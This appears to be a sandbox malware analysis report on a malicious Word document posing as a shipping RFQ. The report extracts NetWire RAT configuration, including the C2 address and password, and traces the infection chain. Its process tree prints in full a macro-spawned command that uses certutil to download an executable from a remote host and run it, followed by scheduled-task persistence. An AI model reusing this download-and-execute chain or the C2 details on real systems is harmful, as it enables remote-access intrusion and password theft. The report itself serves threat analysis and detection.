Overview

overview

10

Static

static

8

RFQ-MVP300...el.doc

windows7-x64

10

RFQ-MVP300...el.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    108s
  • max time network
    49s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    12-10-2022 07:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RFQ-MVP300-3400 For MSA New Vessel.doc

  • Size

    63KB

  • MD5

    5d3e6d263bd94b901830e792fd237693

  • SHA1

    de135c0e1255f334513aff51515de780d8ac8099

  • SHA256

    7ce5a9235acf3eb2001197190b598be8fa49e8f0e2ef9d0ae0a1c2c3095cd7b7

  • SHA512

    3b1a29ef85680507f70f374fa5ec72cc56387b258d4a39ee64dc3ac980170116a0ddff972813a40a247a28f761aa129fea20d69753c543fade5f30c4991a6355

  • SSDEEP

    384:OiCquMo5W4eDbg8iSUR/8daGJrqrjKOxtXYI+Q/cj0tpbnopkpSEP0j:OiCXf5zSe/qvsuxI+4DpbnokSi

Score
10/10
netwirebotnetratstealer

Malware Config

Extracted

Family

netwire

C2

37.0.14.206:3384

Attributes
  • activex_autorun

    false

  • copy_executable

    false

  • delete_original

    false

  • host_id

    HostId-%Rand%

  • install_path

    %AppData%\Install\Host.exe

  • lock_executable

    false

  • offline_keylogger

    false

  • password

    Password234

  • registry_autorun

    false

  • use_mutex

    false

Signatures

  • NetWire RAT payload 2 IoCs
    rat
  • Netwire

    Netwire is a RAT with main functionalities focused password stealing and keylogging, but also includes remote control capabilities as well.

    botnetstealernetwire
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ-MVP300-3400 For MSA New Vessel.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1360
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "http://tulpexim.com/html/dixtin.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\script.vbs && echo CreateObject("WScript.Shell").Run "cmd.exe /c %temp%\bin.exe", 0, True >> %temp%\script.vbs && timeout 3 && start %temp%\script.vbs && timeout 3 && del %temp%\script.vbs
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Windows\SysWOW64\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:988
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2000
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c certutil.exe -urlcache -split -f http://tulpexim.com/html/dixtin.exe C:\Users\Admin\AppData\Local\Temp\bin.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1488
          • C:\Windows\SysWOW64\certutil.exe
            certutil.exe -urlcache -split -f http://tulpexim.com/html/dixtin.exe C:\Users\Admin\AppData\Local\Temp\bin.exe
            5⤵
              PID:1712
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bin.exe
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1696
            • C:\Users\Admin\AppData\Local\Temp\bin.exe
              C:\Users\Admin\AppData\Local\Temp\bin.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1084
              • C:\Windows\SysWOW64\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DpaItRCg" /XML "C:\Users\Admin\AppData\Local\Temp\tmpBCBB.tmp"
                6⤵
                • Creates scheduled task(s)
                PID:1512
              • C:\Users\Admin\AppData\Local\Temp\bin.exe
                "{path}"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:1088
                • C:\Users\Admin\AppData\Roaming\Install\Host.exe
                  "C:\Users\Admin\AppData\Roaming\Install\Host.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:1324
        • C:\Windows\SysWOW64\timeout.exe
          timeout 3
          3⤵
          • Delays execution with timeout.exe
          PID:1072
      • C:\Windows\splwow64.exe
        C:\Windows\splwow64.exe 12288
        2⤵
          PID:1732

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Initial Access

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Modify Registry

      1
      T1112

      Credential Access

      Discovery

      System Information Discovery

      1
      T1082

      Lateral Movement

      Collection

      Exfiltration

      Command and Control

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\bin.exe
        Filesize

        793KB

        MD5

        3f2a653458d88060d8e2dcfde4a2b396

        SHA1

        8b514d159d3aad5ed0eb8b0b5ee7db53e183738e

        SHA256

        af18d799c7288fc034106f041f1595591719fb64adebebc3f78b634229a7f83d

        SHA512

        a4be00914fe7719d7983997e211fe1869eea4a09e31fb40989bb87c325053d76908d70173154713e8fe617739c4559759f1521333646b5d9e1a53c64cb0656a1

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\bin.exe
        Filesize

        793KB

        MD5

        3f2a653458d88060d8e2dcfde4a2b396

        SHA1

        8b514d159d3aad5ed0eb8b0b5ee7db53e183738e

        SHA256

        af18d799c7288fc034106f041f1595591719fb64adebebc3f78b634229a7f83d

        SHA512

        a4be00914fe7719d7983997e211fe1869eea4a09e31fb40989bb87c325053d76908d70173154713e8fe617739c4559759f1521333646b5d9e1a53c64cb0656a1

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\bin.exe
        Filesize

        793KB

        MD5

        3f2a653458d88060d8e2dcfde4a2b396

        SHA1

        8b514d159d3aad5ed0eb8b0b5ee7db53e183738e

        SHA256

        af18d799c7288fc034106f041f1595591719fb64adebebc3f78b634229a7f83d

        SHA512

        a4be00914fe7719d7983997e211fe1869eea4a09e31fb40989bb87c325053d76908d70173154713e8fe617739c4559759f1521333646b5d9e1a53c64cb0656a1

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\script.vbs
        Filesize

        289B

        MD5

        662449f1879133e0fc1f2385f79debfc

        SHA1

        47895b9fb941a4cf85224ead44e3dedb6b4ab6a0

        SHA256

        749c75087d71b5be5b97333ac2a47bf758e4c2a6fc393c40bde00a73cea4fd98

        SHA512

        d200dfb1e4900524d6663f5fc81f08decc5d8c57c57a6dd852e5ea4a59632c9ebec7ff59f275c4acd79130baaab799a5833394867f8acf9d75cf4ffa536e3c83

        Download Submit
      • C:\Users\Admin\AppData\Local\Temp\tmpBCBB.tmp
        Filesize

        1KB

        MD5

        9e3e4a8c3b2e0b97e3d4fe3e309cfc81

        SHA1

        f45d813383a9a4a65bcd416c02b5f529a7e065f2

        SHA256

        05102414e35ab2a37a21a62113069ecf02ce577a1851c65821f2dcf8dbc1fd2b

        SHA512

        0c8f7c05b18ccf718578b62d7234ded0b3947a71c1e15e03b26f697fba1a23c78715ea1d672f3981db514296a08af5f2a8f7232e71712558385d7acc99d5af09

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Install\Host.exe
        Filesize

        793KB

        MD5

        3f2a653458d88060d8e2dcfde4a2b396

        SHA1

        8b514d159d3aad5ed0eb8b0b5ee7db53e183738e

        SHA256

        af18d799c7288fc034106f041f1595591719fb64adebebc3f78b634229a7f83d

        SHA512

        a4be00914fe7719d7983997e211fe1869eea4a09e31fb40989bb87c325053d76908d70173154713e8fe617739c4559759f1521333646b5d9e1a53c64cb0656a1

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Install\Host.exe
        Filesize

        793KB

        MD5

        3f2a653458d88060d8e2dcfde4a2b396

        SHA1

        8b514d159d3aad5ed0eb8b0b5ee7db53e183738e

        SHA256

        af18d799c7288fc034106f041f1595591719fb64adebebc3f78b634229a7f83d

        SHA512

        a4be00914fe7719d7983997e211fe1869eea4a09e31fb40989bb87c325053d76908d70173154713e8fe617739c4559759f1521333646b5d9e1a53c64cb0656a1

        Download Submit
      • \Users\Admin\AppData\Local\Temp\bin.exe
        Filesize

        793KB

        MD5

        3f2a653458d88060d8e2dcfde4a2b396

        SHA1

        8b514d159d3aad5ed0eb8b0b5ee7db53e183738e

        SHA256

        af18d799c7288fc034106f041f1595591719fb64adebebc3f78b634229a7f83d

        SHA512

        a4be00914fe7719d7983997e211fe1869eea4a09e31fb40989bb87c325053d76908d70173154713e8fe617739c4559759f1521333646b5d9e1a53c64cb0656a1

        Download Submit
      • \Users\Admin\AppData\Local\Temp\bin.exe
        Filesize

        793KB

        MD5

        3f2a653458d88060d8e2dcfde4a2b396

        SHA1

        8b514d159d3aad5ed0eb8b0b5ee7db53e183738e

        SHA256

        af18d799c7288fc034106f041f1595591719fb64adebebc3f78b634229a7f83d

        SHA512

        a4be00914fe7719d7983997e211fe1869eea4a09e31fb40989bb87c325053d76908d70173154713e8fe617739c4559759f1521333646b5d9e1a53c64cb0656a1

        Download Submit
      • \Users\Admin\AppData\Roaming\Install\Host.exe
        Filesize

        793KB

        MD5

        3f2a653458d88060d8e2dcfde4a2b396

        SHA1

        8b514d159d3aad5ed0eb8b0b5ee7db53e183738e

        SHA256

        af18d799c7288fc034106f041f1595591719fb64adebebc3f78b634229a7f83d

        SHA512

        a4be00914fe7719d7983997e211fe1869eea4a09e31fb40989bb87c325053d76908d70173154713e8fe617739c4559759f1521333646b5d9e1a53c64cb0656a1

        Download Submit
      • memory/988-124-0x0000000000000000-mapping.dmp
        Download
      • memory/1072-127-0x0000000000000000-mapping.dmp
        Download
      • memory/1084-146-0x00000000049A0000-0x0000000004A38000-memory.dmp
        Filesize

        608KB

        Download
      • memory/1084-136-0x0000000000000000-mapping.dmp
        Download
      • memory/1084-147-0x0000000004880000-0x00000000048CA000-memory.dmp
        Filesize

        296KB

        Download
      • memory/1084-143-0x0000000000950000-0x0000000000970000-memory.dmp
        Filesize

        128KB

        Download
      • memory/1084-138-0x0000000000E00000-0x0000000000ECC000-memory.dmp
        Filesize

        816KB

        Download
      • memory/1088-170-0x0000000000400000-0x000000000044F000-memory.dmp
        Filesize

        316KB

        Download
      • memory/1088-162-0x000000000041AD7B-mapping.dmp
        Download
      • memory/1324-172-0x0000000000350000-0x000000000041C000-memory.dmp
        Filesize

        816KB

        Download
      • memory/1324-168-0x0000000000000000-mapping.dmp
        Download
      • memory/1360-60-0x0000000000736000-0x000000000073A000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1360-145-0x00000000711FD000-0x0000000071208000-memory.dmp
        Filesize

        44KB

        Download
      • memory/1360-65-0x0000000000736000-0x000000000073A000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1360-66-0x0000000000736000-0x000000000073A000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1360-75-0x0000000000736000-0x000000000073A000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1360-55-0x0000000070211000-0x0000000070213000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1360-83-0x0000000000736000-0x000000000073A000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1360-63-0x0000000000736000-0x000000000073A000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1360-61-0x0000000000736000-0x000000000073A000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1360-62-0x0000000000736000-0x000000000073A000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1360-64-0x0000000000736000-0x000000000073A000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1360-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
        Filesize

        64KB

        Download
      • memory/1360-139-0x00000000711FD000-0x0000000071208000-memory.dmp
        Filesize

        44KB

        Download
      • memory/1360-91-0x0000000000736000-0x000000000073A000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1360-115-0x0000000000736000-0x000000000073A000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1360-57-0x00000000760E1000-0x00000000760E3000-memory.dmp
        Filesize

        8KB

        Download
      • memory/1360-54-0x0000000072791000-0x0000000072794000-memory.dmp
        Filesize

        12KB

        Download
      • memory/1360-107-0x0000000000736000-0x000000000073A000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1360-58-0x00000000711FD000-0x0000000071208000-memory.dmp
        Filesize

        44KB

        Download
      • memory/1360-67-0x0000000000736000-0x000000000073A000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1360-59-0x0000000000736000-0x000000000073A000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1360-99-0x0000000000736000-0x000000000073A000-memory.dmp
        Filesize

        16KB

        Download
      • memory/1488-130-0x0000000000000000-mapping.dmp
        Download
      • memory/1512-148-0x0000000000000000-mapping.dmp
        Download
      • memory/1696-133-0x0000000000000000-mapping.dmp
        Download
      • memory/1712-131-0x0000000000000000-mapping.dmp
        Download
      • memory/1732-141-0x0000000000000000-mapping.dmp
        Download
      • memory/1800-123-0x0000000000000000-mapping.dmp
        Download
      • memory/2000-126-0x0000000000000000-mapping.dmp
        Download